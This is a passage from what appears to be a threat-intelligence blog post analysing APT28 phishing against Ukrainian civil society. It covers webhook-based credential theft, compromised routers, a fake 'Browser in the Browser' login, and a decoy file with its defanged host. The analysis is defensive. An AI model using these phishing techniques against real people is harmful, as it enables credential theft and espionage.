The APT28 intrusion set (aka. Sofacy, PawnStorm, Fancy Bear), associated to the Russian GRU and famous for its cyber espionage and sabotage campaigns, was observed using multiple phishing techniques to target the Ukrainian civil society. These techniques include using HTTP webhook services such as as Pipedream and Webhook, as well as compromised Ubiquity routers to steal victims’ credentials. On one occasion, APT28 was seen using the “Browser in the Browser” technique to display a fake login page to the victim, purporting to decrypt a document.
The majority of retrieved phishing webpages target the UKR.NET webmail service, which is popular among Ukrainian society. However, APT28 could use the same techniques against other webmail services used by western civil society which supports Ukraine.
This small blogpost aims at presenting the different techniques used by APT28 to create their spear phishing webpages, as well as ways to detect them, including IOCs and YARA rules.
Technique 1: Man in the browser
During their investigations, Sekoia.io TDR analysts identified a file named CDS Daily Brief 23.03.2023.html, impersonating the Ukrainian security think tank Centre for Defence Strategies. The centre provides online daily briefings on the Russo-Ukrainian conflict. The retrieved decoy document trick the victim into click on a button to decrypt the page content, which is presumably secured by a UKR.NET technology.
Clicking on the button displays fake login window. This window contains an iframe that embeds a fake UKR.NET login webpage hosted on robot-876.frge[.]io – which was deactivated during the investigation and was already